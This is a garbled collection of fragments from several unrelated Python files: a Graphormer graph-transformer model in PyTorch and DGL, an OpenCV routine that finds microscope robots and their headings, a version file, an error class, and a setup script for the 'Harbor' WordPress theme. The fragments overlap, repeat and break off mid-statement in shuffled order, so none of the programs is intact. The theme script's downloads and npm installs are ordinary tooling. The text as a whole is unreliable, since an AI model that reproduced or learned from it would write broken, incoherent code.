"state: state['activation'] = F.relu super(TransformerEncoderLayer, self).__setstate__(state) def forward(self, src, src_mask=None, src_key_padding_mask=None): src2, scores",
"else: graphs.ndata['h'] = encoding + embedding.squeeze() batch = [] for g in dgl.unbatch(graphs):",
"d_model * expansion_factor self.concatenate_encoding = concatenate_encoding if concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size) self.node_embedder =",
"torch.nn.functional as F import numpy as np from scipy.linalg import eig class TopologicalEncoding():",
"[] for momentum in momenta: momenta_.append(np.pad(momentum, (0, clipping))) momenta = np.array(momenta_) elif clipping",
"from scipy.linalg import eig class TopologicalEncoding(): def __init__(self, encoding_size=50): self.encoding_size = encoding_size def",
"graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees()) L = (D - A).numpy() w, V = eig(L)",
"nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout) self.activation = F.relu def __setstate__(self, state):",
"clipping > 0: momenta_ = [] for momentum in momenta: momenta_.append(np.pad(momentum, (0, clipping)))",
"super(TransformerEncoderLayer, self).__setstate__(state) def forward(self, src, src_mask=None, src_key_padding_mask=None): src2, scores = self.self_attn(src, src, src,",
"import torch import torch.nn as nn import torch.nn.functional as F import numpy as",
"torch.nn.utils.rnn.pad_sequence(batch) attentions_ = [] for block in self.blocks: h, att_ = block(h) if",
"momenta = np.array(momenta_) elif clipping < 0: momenta = momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta))",
"torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn",
"= self.self_attn(src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src = src + self.dropout1(src2) src =",
"= torch.cat([self.encoder.encode(graph) for graph in dgl.unbatch(graphs)], dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h']",
"self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src + self.dropout2(src2) src = self.norm2(src) return",
"for block in self.blocks: h, att_ = block(h) if need_weights: attentions_.append(att_) truncated =",
"d_model) self.norm1 = nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout)",
"concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size, d_model - encoding_size) else: self.node_embedder =",
"eig class TopologicalEncoding(): def __init__(self, encoding_size=50): self.encoding_size = encoding_size def encode(self, graph): A",
"block(h) if need_weights: attentions_.append(att_) truncated = [h[:num_nodes, i, :] for i, num_nodes in",
"import numpy as np from scipy.linalg import eig class TopologicalEncoding(): def __init__(self, encoding_size=50):",
"[h[:num_nodes, i, :] for i, num_nodes in enumerate(graphs.batch_num_nodes())] h = torch.cat(truncated, dim=0) if",
"self.concatenate_encoding = concatenate_encoding if concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size, d_model -",
"nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout) self.activation = F.relu def __setstate__(self, state): if 'activation' not",
"momenta_ = [] for momentum in momenta: momenta_.append(np.pad(momentum, (0, clipping))) momenta = np.array(momenta_)",
"= F.relu super(TransformerEncoderLayer, self).__setstate__(state) def forward(self, src, src_mask=None, src_key_padding_mask=None): src2, scores = self.self_attn(src,",
"in dgl.unbatch(graphs)], dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()), dim=-1)",
"dgl import torch import torch.nn as nn import torch.nn.functional as F import numpy",
"graph.num_nodes() if clipping > 0: momenta_ = [] for momentum in momenta: momenta_.append(np.pad(momentum,",
"self.dim_feedforward = d_model * expansion_factor self.concatenate_encoding = concatenate_encoding if concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size)",
"= F.relu def __setstate__(self, state): if 'activation' not in state: state['activation'] = F.relu",
":self.encoding_size] return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer,",
"dim=-1) else: graphs.ndata['h'] = encoding + embedding.squeeze() batch = [] for g in",
"nn.Linear(dim_feedforward, d_model) self.norm1 = nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout) self.dropout2 =",
"expansion_factor self.concatenate_encoding = concatenate_encoding if concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size, d_model",
"as F import numpy as np from scipy.linalg import eig class TopologicalEncoding(): def",
"[] for block in self.blocks: h, att_ = block(h) if need_weights: attentions_.append(att_) truncated",
"self.blocks: h, att_ = block(h) if need_weights: attentions_.append(att_) truncated = [h[:num_nodes, i, :]",
"for i, num_nodes in enumerate(graphs.batch_num_nodes())] h = torch.cat(truncated, dim=0) if need_weights: return h,",
"src, scores class Graphormer(nn.Module): def __init__(self, d_model=128, depth=5, nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu',",
"nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for _ in range(depth)]) def forward(self, graphs, need_weights=False): encoding =",
"> 0: momenta_ = [] for momentum in momenta: momenta_.append(np.pad(momentum, (0, clipping))) momenta",
"= nn.Linear(dim_feedforward, d_model) self.norm1 = nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout) self.dropout2",
"(0, clipping))) momenta = np.array(momenta_) elif clipping < 0: momenta = momenta[:, :self.encoding_size]",
"if 'activation' not in state: state['activation'] = F.relu super(TransformerEncoderLayer, self).__setstate__(state) def forward(self, src,",
"_ in range(depth)]) def forward(self, graphs, need_weights=False): encoding = torch.cat([self.encoder.encode(graph) for graph in",
"super().__init__() self.d_model = d_model self.depth = depth self.nhead = nhead self.dim_feedforward = d_model",
"embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()), dim=-1) else: graphs.ndata['h'] =",
"self.norm2 = nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout) self.activation = F.relu def",
"= eig(L) momenta = np.dot(L, V) clipping = self.encoding_size - graph.num_nodes() if clipping",
"= self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()), dim=-1) else: graphs.ndata['h'] = encoding",
"if concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size, d_model - encoding_size) else: self.node_embedder",
"d_model=128, depth=5, nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__() self.d_model = d_model self.depth",
"self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout = nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward, d_model) self.norm1 =",
"self).__setstate__(state) def forward(self, src, src_mask=None, src_key_padding_mask=None): src2, scores = self.self_attn(src, src, src, attn_mask=src_mask,",
"nn.Linear(d_model, dim_feedforward) self.dropout = nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward, d_model) self.norm1 = nn.LayerNorm(d_model) self.norm2",
"+ self.dropout1(src2) src = self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src + self.dropout2(src2)",
"= concatenate_encoding if concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size, d_model - encoding_size)",
"= nn.Linear(d_model, dim_feedforward) self.dropout = nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward, d_model) self.norm1 = nn.LayerNorm(d_model)",
"= graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees()) L = (D - A).numpy() w, V =",
"- encoding_size) else: self.node_embedder = nn.Embedding(alphabet_size, d_model) self.encoder = TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model,",
"self.linear2 = nn.Linear(dim_feedforward, d_model) self.norm1 = nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout)",
"self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for _ in range(depth)]) def forward(self, graphs, need_weights=False):",
"+ self.dropout2(src2) src = self.norm2(src) return src, scores class Graphormer(nn.Module): def __init__(self, d_model=128,",
"return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__()",
"= d_model * expansion_factor self.concatenate_encoding = concatenate_encoding if concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size) self.node_embedder",
"embedding.squeeze() batch = [] for g in dgl.unbatch(graphs): batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch) attentions_",
"if self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()), dim=-1) else: graphs.ndata['h'] = encoding + embedding.squeeze()",
"num_nodes in enumerate(graphs.batch_num_nodes())] h = torch.cat(truncated, dim=0) if need_weights: return h, attentions_ return",
"momenta: momenta_.append(np.pad(momentum, (0, clipping))) momenta = np.array(momenta_) elif clipping < 0: momenta ="
] |
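A minimal smoke test for the model above. The toy graph, its 'atomic' node feature values, and the hyperparameters are made up for illustration; it assumes torch, dgl, and scipy are installed and that DGL's adjacency_matrix()/in_degrees() behave as encode() uses them.

import dgl
import torch

# a toy 3-node path graph with atomic-number node features, as forward() expects
g = dgl.graph((torch.tensor([0, 1]), torch.tensor([1, 2])), num_nodes=3)
g.ndata['atomic'] = torch.tensor([6, 6, 8])  # e.g. a C-C-O fragment

model = Graphormer(d_model=128, depth=2, nhead=8, encoding_size=32)
model.eval()  # disable dropout for a deterministic pass
out = model(dgl.batch([g]))
print(out.shape)  # torch.Size([3, 128]): one d_model vector per node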
# OpenCV helpers: detect robots in a microscope frame and estimate each one's heading.
import cv2
import numpy as np


def detect(img):
    # finds and fills the located robots
    img = cv2.convertScaleAbs(img, alpha=1.5)  # contrast boost; keyword avoids the positional dst slot
    structure = np.ones((3, 3))
    canny = np.copy(cv2.Canny(img, 20, 120))
    dilated = cv2.dilate(canny, structure)
    contours, hier = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    # fill every contour (index -1) with value 1, honoring one level of the hierarchy
    filled = cv2.drawContours(np.zeros(img.shape, dtype=np.uint8), contours, -1, 1, -1, 0, hier, 1)
    return np.copy(filled)


def get_large_contours(detect):
    # take a detection mask, and contour information add circles
    contours, hier = cv2.findContours(detect, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    large_contours = []
    contour_area_minimum = 2000
    for c in contours:
        if cv2.contourArea(c) > contour_area_minimum:
            large_contours.append(c)
    return large_contours


def get_robot_angle(contour, center):
    contour = np.squeeze(np.copy(contour))
    contour -= center
    theta = np.arctan2(contour[:, 1], contour[:, 0])
    # rho = np.sqrt(contour[:, 0] ** 2 + contour[:, 1] ** 2)
    val, bin_edges = np.histogram(theta, bins=50, range=[-np.pi, np.pi])
    bin_centers = bin_edges[:-1] + np.diff(bin_edges) / 2
    # mean direction of the *empty* angular bins, i.e. of the gap in the outline
    return np.nanmean(np.where(val == 0, bin_centers, np.nan))


def get_robots(large_contours, detect, objective):
    # get memory (note: the parameter name shadows detect() above)
    robot_control_mask = np.zeros(detect.shape)
    large_contour_image = cv2.drawContours(np.copy(robot_control_mask), large_contours, -1, 1, -1)
    # probably needs more adjustment in the future, so will make a dict for now
    objective_calibration_dict = {'2x': 4, '4x': 2, '10x': 1, '20x': 1, '40x': 1}
    robot_angles = []
    contours_towards_center = []
    contour_range_border_limit = 100 * objective_calibration_dict[objective]
    contours_in_limits = []
    for contour in large_contours:
        xs = np.squeeze(contour)[:, 0]
        ys = np.squeeze(contour)[:, 1]
        # check that our contours are within acceptable limits, draw their circle if they are
        # (both axes are compared against shape[0], which assumes a square frame)
        if np.all(xs > contour_range_border_limit) and np.all(
                xs < large_contour_image.shape[0] - contour_range_border_limit):
            if np.all(ys > contour_range_border_limit) and np.all(
                    ys < large_contour_image.shape[0] - contour_range_border_limit):
                contours_in_limits.append(contour)
                M = cv2.moments(contour)
                cx = int(M["m10"] / M["m00"])
                cy = int(M["m01"] / M["m00"])
                contours_towards_center.append(contour)
                angle = get_robot_angle(contour, (cx, cy))
                robot_angles.append(angle)
    return contours_towards_center, robot_angles


def get_robot_control(img, objective):
    detected = detect(img)
    large_contours = get_large_contours(detected)
    robots, robot_angles = get_robots(large_contours, detected, objective)
    return robots, robot_angles
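get_robot_angle is pure NumPy, so it can be sanity-checked without a camera or OpenCV in the loop. A minimal sketch with an invented contour: points on a circle with a sector cut out around angle 0, so the empty histogram bins, and hence the returned heading, point along +x.

import numpy as np

# circle of radius 80 around (100, 100), missing the arc within 0.5 rad of angle 0
theta = np.linspace(0.5, 2 * np.pi - 0.5, 200)
pts = np.stack([100 + 80 * np.cos(theta), 100 + 80 * np.sin(theta)], axis=1)
contour = pts[:, None, :]  # OpenCV-style contour shape (N, 1, 2)

print(get_robot_angle(contour, (100, 100)))  # ~0.0: the gap in the outline faces +x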
"""Package-level information"""
__MAJOR__ = 0
__MINOR__ = 0
__MICRO__ = 1
__VERSION__ = (__MAJOR__, __MINOR__, __MICRO__)
__version__ = '.'.join(str(n) for n in __VERSION__)
__github_url__ = 'https://github.com/JWKennington/CompPhys'

from compphys.tests import run_tests  # top level function for running test suite, analogous to scipy.test()
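The version string is derived from the tuple rather than written out twice, so the two can never drift apart. The same pattern, standalone:

VERSION = (0, 0, 1)
version = '.'.join(str(n) for n in VERSION)
assert version == '0.0.1'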
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
err.py

Redlight errors
"""

__author__ = '<NAME> <<EMAIL>>'
__copyright__ = 'Copyright 2012 Vanderbilt University. All Rights Reserved'


class RedlightError(Exception):
    pass
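Since RedlightError subclasses Exception without adding any state, callers use it like any built-in exception type; a hypothetical example:

try:
    raise RedlightError("example failure")
except RedlightError as err:
    print("caught:", err)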
# -*- coding: utf-8 -*-
"""
Created on Thu Aug  3 14:20:50 2017

@author: <NAME>
"""
import zipfile
import os
import requests
import glob
import subprocess
import platform
import sys, getopt
import argparse
import re


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--update', action='store_true', dest='update', default=False,
                        help="Check for updates to the harbor script")
    parser.add_argument('-i', '--install', action='store_true', dest='install', default=False,
                        help="Install harbor theme in current directory")
    parser.add_argument('-d', '--directory', action='store', dest='dir',
                        help="Specify a directory to install Harbor theme to or if -u option "
                             "is present updates the Harbor based theme in that directory")
    plat = platform.system()  # right-hand side missing in the source; platform.system() is a guess
    results = parser.parse_args()
    install = results.install
    update = results.update
    setup_dir = results.dir
    if(install):
        if setup_dir is not None:
            os.chdir(setup_dir)
        if platform.system() != "Windows":
            if os.getuid() != 0:
                print("Please run this script as root")  # leading words of the message inferred
                print("Example: 'sudo python3 setup.py'")
                return
        #download theme zip
        if fetchArchive():
            # continuation missing in the source; the calls below are inferred from the
            # function signatures (setupTheme() returns the slug setupEnvironment() takes)
            slug = setupTheme()
            setupEnvironment(slug)
    elif update:
        if setup_dir is not None:
            updateTheme(setup_dir)
        else:
            print("Checking for updates to Harbor script...")
            print("Up to date!")
    else:
        parser.print_usage()


def updateTheme(directory):
    os.chdir(directory)
    print("Updating theme...")
    os.system("bower list > updates.tmp")
    update_avail = re.compile(r"\(([0-9]\.)*[0-9] available\)")
    nameRe = re.compile(r"[a-z]+-*[a-z]*#")
    #print(update_avail.findall("├─┬ breakpoint-sass#2.5.0 "))
    #exit(0)
    with open("updates.tmp", "r") as update_file:
        for line in update_file:
            results = update_avail.findall(line)
            if results != []:
                print(line)
                nameMatch = nameRe.search(line)
                name = nameMatch.group()[:-1]
                ans = input("Update module?(Y/n)")
                while ans != "" and ans.lower()[0] != 'y' and ans.lower()[0] != 'n':
                    ans = input("Update module?(Y/n)")
                if(ans == "" or ans.lower()[0] == 'y'):
                    print("updating", name, sep=" ")
                    os.system("bower update " + name)
                    print("")
    print("Done!")


# Downloads the starter theme _s from github
def fetchArchive():
    print("Downloading Theme files...", end=' ')
    file = requests.get("https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip")
    if file.status_code != 200:
        print("Error: There was a problem while downloading the files.\n\tAborting. ")
        return False
    with open("sass-restructure.zip", "wb") as content:
        content.write(file.content)
    print("Done!")
    print("Extracting files...", end=' ')
    with zipfile.ZipFile("sass-restructure.zip", "r") as file:
        file.extractall(".")
    print("Done!")
    return True


def setupTheme():
    name = input("Enter a name for the theme: ")
    slug = name.lower().replace(' ', '-')
    funcSlug = name.lower().replace(' ', '_')
    desc = input("Enter a short description for the theme: ")
    print("Setting up Theme...", end=' ')
    os.rename("./Harbor-sass-restructure", "./" + slug)
    files = glob.glob("./" + slug + "/*.php")
    for filename in glob.glob("./" + slug + "/*/*.php"):
        files.append(filename)
    strings = []
    strings.append(("'harbor'", "'" + slug + "'"))
    strings.append(("harbor_", funcSlug + "_"))
    strings.append((" <code> Harbor</code>", " <code> " + name.replace(' ', '_') + "</code>"))
    strings.append(("Harbor-", slug + "-"))
    findInFiles(strings, files)
    headerInfo = []
    headerInfo.append(("Text Domain: harbor", "Text Domain: " + slug))
    headerInfo.append(("Theme Name: Harbor", "Theme Name: " + name))
    headerInfo.append(("Description: Harbor is a starter theme and development environment setup "
                       "by Infinity Marketing that is heavily based on Automattic's Underscores theme.",
                       "Description: " + desc))
    findInFiles(headerInfo, ["./" + slug + "/style.css", "./" + slug + "/sass/style.scss"])
    print('Done!')
    return slug


def findInFiles(strings, files):
    for filename in files:
        file = open(filename, "r")
        filedata = file.read()
        file.close()
        for change in strings:
            filedata = filedata.replace(change[0], change[1])
        file = open(filename, "w")  # write-back inferred; the source breaks off after "file ="
        file.write(filedata)
        file.close()


def setupEnvironment(slug):
    cmd = "where" if platform.system() == "Windows" else "which"
    npm = subprocess.run(cmd + " npm", shell=True)
    if npm.returncode == 1:
        print("NodeJs is not installed. Aborting")
        return
    bower = subprocess.run(cmd + " bower", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    if bower.returncode == 1:
        print("Bower is not installed.")
        print("Installing bower...")
        subprocess.run("npm install -g bower", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        print("Done!")
    gulp = subprocess.run(cmd + " gulp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    if gulp.returncode == 1:
        print("Gulp is not installed")
        print("Installing Gulp...", end=' ')
        subprocess.run("npm install -g gulp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        print("Done!")
    print("Installing dependencies...")
    # (truncated: the source breaks off inside a subprocess.run("bower ... call;
    # the remainder of the file is not recoverable)
"print(\"Installing dependancies...\") subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug) subprocess.run(\"npm install\", shell=True, cwd=\"./\"+slug) print(\"Done!\") if(__name__ ==",
"results = update_avail.findall(line) if results != []: print(line) nameMatch = nameRe.search(line) name =",
"zipfile import os import requests import glob import subprocess import platform import sys,",
"is not installed\") print(\"Installing Gulp...\", end=' ') subprocess.run(\"npm install -g gulp\", shell=True, stdout=subprocess.PIPE,",
"or if -u option is present updates the Harbor based theme in that",
"\"Windows\" else \"which\" npm = subprocess.run(cmd+ \" npm\", shell=True) if npm.returncode == 1:",
"in current directory\") parser.add_argument('-d', '--directory', action='store', dest='dir', help=\"Specify a directory to install Harbor",
"for line in update_file: results = update_avail.findall(line) if results != []: print(line) nameMatch",
"+ slug) files = glob.glob(\"./\" + slug + \"/*.php\") for filename in glob.glob(\"./\"",
"list > updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \"))",
"\"wb\") as content: content.write(file.content) print(\"Done!\") print(\"Extracting files...\", end=' ') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as",
"bower.returncode == 1: print(\"Bower is not installed.\") print(\"Installing bower...\") subprocess.run(\"npm install -g bower\",",
"parser.print_usage() def updateTheme(directory): os.chdir(directory) print(\"Updating theme...\") os.system(\"bower list > updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9]",
"= setupTheme() setupEnvironment(slug) elif update: if setup_dir is not None: updateTheme(setup_dir) else: print(\"Checking",
"for filename in glob.glob(\"./\" + slug + \"/*/*.php\"): files.append(filename) strings = [] strings.append((\"'harbor'\",",
"python3 # -*- coding: utf-8 -*- \"\"\" Created on Thu Aug 3 14:20:50",
"#print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \")) #exit(0) with open(\"updates.tmp\", \"r\") as update_file: for line in update_file:",
"file.extractall(\".\") print(\"Done!\") return True def setupTheme(): name = input(\"Enter a name for the",
"findInFiles(headerInfo, [\"./\" + slug + \"/style.css\", \"./\" + slug + \"/sass/style.scss\"]) print('Done!') return",
"name = input(\"Enter a name for the theme: \") slug = name.lower().replace(' ',",
"to the harbor script\") parser.add_argument('-i', '--install', action='store_true', dest='install', default=False, help=\"Install harbor theme in",
"') os.rename(\"./Harbor-sass-restructure\", \"./\" + slug) files = glob.glob(\"./\" + slug + \"/*.php\") for",
"\"r\") filedata = file.read() file.close() for change in strings: filedata = filedata.replace(change[0], change[1])",
"else \"which\" npm = subprocess.run(cmd+ \" npm\", shell=True) if npm.returncode == 1: print(\"NodeJs",
"headerInfo = [] headerInfo.append((\"Text Domain: harbor\", \"Text Domain: \" + slug)) headerInfo.append((\"Theme Name:",
"is present updates the Harbor based theme in that directory\") plat = platform.system()",
"stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug) subprocess.run(\"npm install\", shell=True, cwd=\"./\"+slug) print(\"Done!\")",
"strings.append((\" <code> Harbor</code>\", \" <code> \" + name.replace(' ', '_') + \"</code>\")) strings.append((\"Harbor-\", slug +",
"Name: \" + name)) headerInfo.append((\"Description: Harbor is a starter theme and development environment",
"script\") parser.add_argument('-i', '--install', action='store_true', dest='install', default=False, help=\"Install harbor theme in current directory\") parser.add_argument('-d',",
"slug = setupTheme() setupEnvironment(slug) elif update: if setup_dir is not None: updateTheme(setup_dir) else:",
"== \"\" or ans.lower()[0] == 'y'): print(\"updating\", name, sep=\" \") os.system(\"bower update \"",
"strings.append((\"Harbor-\", slug + \"-\")) findInFiles(strings, files) headerInfo = [] headerInfo.append((\"Text Domain: harbor\", \"Text",
"is a starter theme and development environment setup by Infinity Marketing that is",
"print(\"Bower is not installed.\") print(\"Installing bower...\") subprocess.run(\"npm install -g bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)",
"Infinity Marketing that is heavily based on Automattic's Underscores theme.\", \"Description: \" +",
"up Theme...\") slug = setupTheme() setupEnvironment(slug) elif update: if setup_dir is not None:",
"\"which\" npm = subprocess.run(cmd+ \" npm\", shell=True) if npm.returncode == 1: print(\"NodeJs is",
"'sudo python3 setup.py'\") return #download theme zip if fetchArchive() == False: return 1",
"or ans.lower()[0] == 'y'): print(\"updating\", name, sep=\" \") os.system(\"bower update \" + name)",
"-g bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") gulp = subprocess.run(cmd+ \" gulp\", shell=True, stdout=subprocess.PIPE,",
"True def setupTheme(): name = input(\"Enter a name for the theme: \") slug",
"results = parser.parse_args() install = results.install update = results.update setup_dir = results.dir if(install):",
"# -*- coding: utf-8 -*- \"\"\" Created on Thu Aug 3 14:20:50 2017",
"if setup_dir is not None: os.chdir(setup_dir) if platform.system() != \"Windows\": if os.getuid() !=",
"name)) headerInfo.append((\"Description: Harbor is a starter theme and development environment setup by Infinity",
"+ \"-\")) findInFiles(strings, files) headerInfo = [] headerInfo.append((\"Text Domain: harbor\", \"Text Domain: \"",
"file.read() file.close() for change in strings: filedata = filedata.replace(change[0], change[1]) file = open(filename,",
"== \"Windows\" else \"which\" npm = subprocess.run(cmd+ \" npm\", shell=True) if npm.returncode ==",
"end=' ') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code != 200: print(\"Error: There was a",
"fetchArchive(): try: os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass print(\"Downloading Theme files...\", end=' ') file =",
"ans = input(\"Update module?(Y/n)\") while ans != \"\" and ans.lower()[0] != 'y' and",
"this script as root\") print(\"Example: 'sudo python3 setup.py'\") return #download theme zip if",
"installed.\") print(\"Installing bower...\") subprocess.run(\"npm install -g bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") gulp =",
"import re def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true', dest='update', default=False, help=\"Check",
"import requests import glob import subprocess import platform import sys, getopt import argparse",
"import zipfile import os import requests import glob import subprocess import platform import",
"setupTheme(): name = input(\"Enter a name for the theme: \") slug = name.lower().replace('",
"nameMatch = nameRe.search(line) name = nameMatch.group()[:-1] ans = input(\"Update module?(Y/n)\") while ans !=",
"\"r\") as file: file.extractall(\".\") print(\"Done!\") return True def setupTheme(): name = input(\"Enter a",
"== 1: print(\"NodeJs is not installed. Aborting\") return bower = subprocess.run(cmd+ \" bower\",",
"\" gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if gulp.returncode == 1: print(\"Gulp is not installed\")",
"print(\"Done!\") # Downloads the starter theme _s from github def fetchArchive(): try: os.remove(\"sass-restructure.zip\")",
"not None: updateTheme(setup_dir) else: print(\"Checking for updates to Harbor script...\") print(\"Up to date!\")",
"if gulp.returncode == 1: print(\"Gulp is not installed\") print(\"Installing Gulp...\", end=' ') subprocess.run(\"npm",
"for updates to Harbor script...\") print(\"Up to date!\") else: parser.print_usage() def updateTheme(directory): os.chdir(directory)",
"name.lower().replace(' ', '_') desc = input(\"Enter a short description for the theme: \")",
"= input(\"Enter a name for the theme: \") slug = name.lower().replace(' ', '-')",
"shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug) subprocess.run(\"npm install\", shell=True,",
"date!\") else: parser.print_usage() def updateTheme(directory): os.chdir(directory) print(\"Updating theme...\") os.system(\"bower list > updates.tmp\") update_avail",
"update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \")) #exit(0) with open(\"updates.tmp\",",
"ans = input(\"Update module?(Y/n)\") if(ans == \"\" or ans.lower()[0] == 'y'): print(\"updating\", name,",
"\"where\" if platform.system() == \"Windows\" else \"which\" npm = subprocess.run(cmd+ \" npm\", shell=True)",
"-u option is present updates the Harbor based theme in that directory\") plat",
"theme...\") os.system(\"bower list > updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬",
"\"\"\" Created on Thu Aug 3 14:20:50 2017 @author: <NAME> \"\"\" import zipfile",
"\" + name) print(\"\") print(\"Done!\") # Downloads the starter theme _s from github",
"shell=True) if npm.returncode == 1: print(\"NodeJs is not installed. Aborting\") return bower =",
"if platform.system() != \"Windows\": if os.getuid() != 0: print(\"Please run this script as",
"Harbor based theme in that directory\") plat = platform.system() results = parser.parse_args() install",
"os.chdir(directory) print(\"Updating theme...\") os.system(\"bower list > updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe =",
"name = nameMatch.group()[:-1] ans = input(\"Update module?(Y/n)\") while ans != \"\" and ans.lower()[0]",
"\" + desc)) findInFiles(headerInfo, [\"./\" + slug + \"/style.css\", \"./\" + slug +",
"filedata = file.read() file.close() for change in strings: filedata = filedata.replace(change[0], change[1]) file",
"bower = subprocess.run(cmd+ \" bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode == 1: print(\"Bower",
"file = open(filename, \"r\") filedata = file.read() file.close() for change in strings: filedata",
"change[1]) file = open(filename, \"w\") file.write(filedata) file.close() def setupEnvironment(slug): cmd = \"where\" if",
"action='store_true', dest='update', default=False, help=\"Check for updates to the harbor script\") parser.add_argument('-i', '--install', action='store_true',",
"as update_file: for line in update_file: results = update_avail.findall(line) if results != []:",
"print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug) subprocess.run(\"npm install\", shell=True, cwd=\"./\"+slug) print(\"Done!\") if(__name__",
"main(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true', dest='update', default=False, help=\"Check for updates to",
"= filedata.replace(change[0], change[1]) file = open(filename, \"w\") file.write(filedata) file.close() def setupEnvironment(slug): cmd =",
"if file.status_code != 200: print(\"Error: There was a problem while downloading the files.\\n\\tAborting.",
"setup_dir is not None: updateTheme(setup_dir) else: print(\"Checking for updates to Harbor script...\") print(\"Up",
